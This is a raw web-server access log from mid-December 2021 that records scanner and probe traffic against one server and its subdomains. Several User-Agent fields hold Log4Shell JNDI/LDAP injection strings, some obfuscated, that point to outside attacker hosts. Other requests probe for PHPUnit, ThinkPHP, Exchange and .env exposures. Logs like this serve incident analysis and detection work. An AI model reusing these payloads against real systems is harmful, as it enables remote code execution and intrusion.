-] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:15:41:49 +0000] 400 - - http localhost "-" [Client 87.251.75.144] [Length 154] [Gzip -] "-" "-" [13/Dec/2021:16:18:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:17:39:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.199.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:18:21:30 +0000] 444 - GET https pop.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; MI 2 Build/O012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [13/Dec/2021:18:38:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.42] [Length 0] [Gzip -] "-" "-" [13/Dec/2021:18:38:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "-" "-" [13/Dec/2021:18:38:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Dec/2021:19:52:01 +0000] 400 - - http localhost "-" [Client 45.227.254.9] [Length 154] [Gzip -] "-" "-" [13/Dec/2021:19:52:01 +0000] 400 - - http localhost "-" [Client 45.227.254.9] [Length 154] [Gzip -] "-" "-" [13/Dec/2021:21:04:52 +0000] 400 - - http localhost "-" [Client 94.179.210.154] [Length 154] [Gzip -] "-" "-" [13/Dec/2021:21:18:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Dec/2021:21:48:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:1389/t}" "-" [13/Dec/2021:21:48:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}" "-" [13/Dec/2021:21:48:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}" "-" [13/Dec/2021:21:48:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" "-" [13/Dec/2021:21:49:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:21:53:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:21:53:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:22:20:21 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 34.96.130.26] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [13/Dec/2021:22:28:10 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Dec/2021:22:42:31 +0000] 444 - GET https tw.moralanimal.net "/" [Client 34.96.130.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [13/Dec/2021:22:56:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [13/Dec/2021:23:36:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Dec/2021:23:47:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [14/Dec/2021:00:26:15 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [14/Dec/2021:00:51:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.105.55.17] [Length 0] [Gzip -] "/${jndi:ldap://45.83.193.150:1389/Exploit}" "-" [14/Dec/2021:00:58:19 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:00:58:19 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:00:58:19 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:01:13:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [14/Dec/2021:01:34:17 +0000] 444 - GET https newmail.moralanimal.net "/" [Client 34.86.35.28] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:01:34:22 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 34.86.35.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:01:52:18 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 34.86.35.13] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:01:53:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [14/Dec/2021:02:29:49 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:02:44:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.210.45.163] [Length 0] [Gzip -] "/${jndi:ldap://45.83.193.150:1389/Exploit}" "-" [14/Dec/2021:02:58:36 +0000] 444 - GET https owa.moralanimal.net "/" [Client 34.96.130.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:02:59:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:03:14:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.76] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:03:39:09 +0000] 444 - GET https ms1.moralanimal.net "/" [Client 34.86.35.31] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:03:57:23 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:03:57:23 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:03:57:23 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:04:12:34 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:05:15:52 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:06:21:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 141.98.83.139] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" "-" [14/Dec/2021:06:24:43 +0000] 400 - - http localhost "-" [Client 45.227.254.9] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:06:24:43 +0000] 400 - - http localhost "-" [Client 45.227.254.9] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:06:24:57 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.96.130.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:06:52:31 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Dec/2021:07:42:27 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:08:01:28 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:08:04:30 +0000] 444 - GET https srv.moralanimal.net "/" [Client 34.77.162.2] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:08:23:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.237.101.15] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6" "-" [14/Dec/2021:08:23:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.237.101.15] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6" "-" [14/Dec/2021:09:03:18 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:09:56:56 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:09:56:56 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:10:13:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Dec/2021:11:26:50 +0000] 444 - GET https vmail.moralanimal.net "/" [Client 34.77.162.2] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Dec/2021:11:45:17 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:11:57:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:12:38:07 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.241] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:13:30:06 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Dec/2021:13:30:06 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Dec/2021:13:31:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [14/Dec/2021:13:31:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [14/Dec/2021:14:02:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.98.224.68] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Dec/2021:14:02:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.98.224.68] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Dec/2021:14:02:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.98.224.68] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Dec/2021:14:02:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.98.224.68] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Dec/2021:16:08:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.149.192.165] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-" [14/Dec/2021:16:39:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.76] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [14/Dec/2021:16:39:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.76] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [14/Dec/2021:17:20:10 +0000] 444 - GET https localhost "/" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:10 +0000] 444 - OPTIONS https localhost "/" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:10 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:10 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:15 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:15 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:15 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:16 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:16 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:16 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:16 +0000] 400 - - https localhost "-" [Client 47.252.25.151] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:17:20:20 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.252.25.151] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:20 +0000] 444 - GET https 64.22.31.253 "/text4041639502420" [Client 47.252.25.151] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:20 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.252.25.151] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:20 +0000] 400 - GET http 64.22.31.253 "/text4041639502420" [Client 47.252.25.151] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:20 +0000] 444 - GET https localhost "/" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:21 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.252.25.151] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:21 +0000] 400 - GET http localhost "/" [Client 47.252.25.151] [Length 252] [Gzip -] "-" "-" [14/Dec/2021:17:20:21 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.252.25.151] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:21 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.252.25.151] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:21 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.252.25.151] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:17:20:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.252.25.151] [Length 252] [Gzip -] "-" "-" [14/Dec/2021:17:20:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.252.25.151] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:17:20:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.252.25.151] [Length 0] [Gzip -] "curl/7.75.0" "-" [14/Dec/2021:17:56:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.57] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:18:21:53 +0000] 444 - GET https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:21:54 +0000] 444 - OPTIONS https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:21:55 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:21:56 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:01 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:22:02 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:03 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:04 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:04 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:05 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:06 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [14/Dec/2021:18:22:07 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:07 +0000] 444 - GET https 64.22.31.253 "/text4041639506126" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:07 +0000] 400 - GET http 64.22.31.253 "/text4041639506126" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:07 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:08 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:09 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:09 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:09 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [14/Dec/2021:18:22:09 +0000] 444 - GET https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:22:10 +0000] 400 - GET http localhost "/" [Client 47.243.5.86] [Length 252] [Gzip -] "-" "-" [14/Dec/2021:18:22:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:22:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.243.5.86] [Length 252] [Gzip -] "-" "-" [14/Dec/2021:18:22:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:18:22:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "curl/7.75.0" "-" [14/Dec/2021:20:49:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.60] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:20:49:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "-" "-" [14/Dec/2021:21:52:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:21:54:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:21:54:34 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:22:30:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.89.194.175] [Length 0] [Gzip -] "-" "-" [14/Dec/2021:23:20:51 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.215.29] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:23:27:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [14/Dec/2021:23:38:42 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.195.31] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Dec/2021:23:47:24 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:00:39:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Dec/2021:01:04:19 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:02:08:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:02:22:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Dec/2021:03:04:35 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.124] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Dec/2021:03:18:14 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Dec/2021:03:51:43 +0000] 444 - GET https localhost "/" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:51:43 +0000] 444 - OPTIONS https localhost "/" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:51:43 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:51:44 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:51:49 +0000] 400 - - https localhost "-" [Client 50.31.21.4] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:03:53:33 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:33 +0000] 444 - GET https localhost "/" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:53:33 +0000] 400 - GET http localhost "/" [Client 50.31.21.4] [Length 252] [Gzip -] "-" "-" [15/Dec/2021:03:53:33 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 50.31.21.4] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.4] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:03:53:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.4] [Length 252] [Gzip -] "-" "-" [15/Dec/2021:03:53:34 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 50.31.21.4] 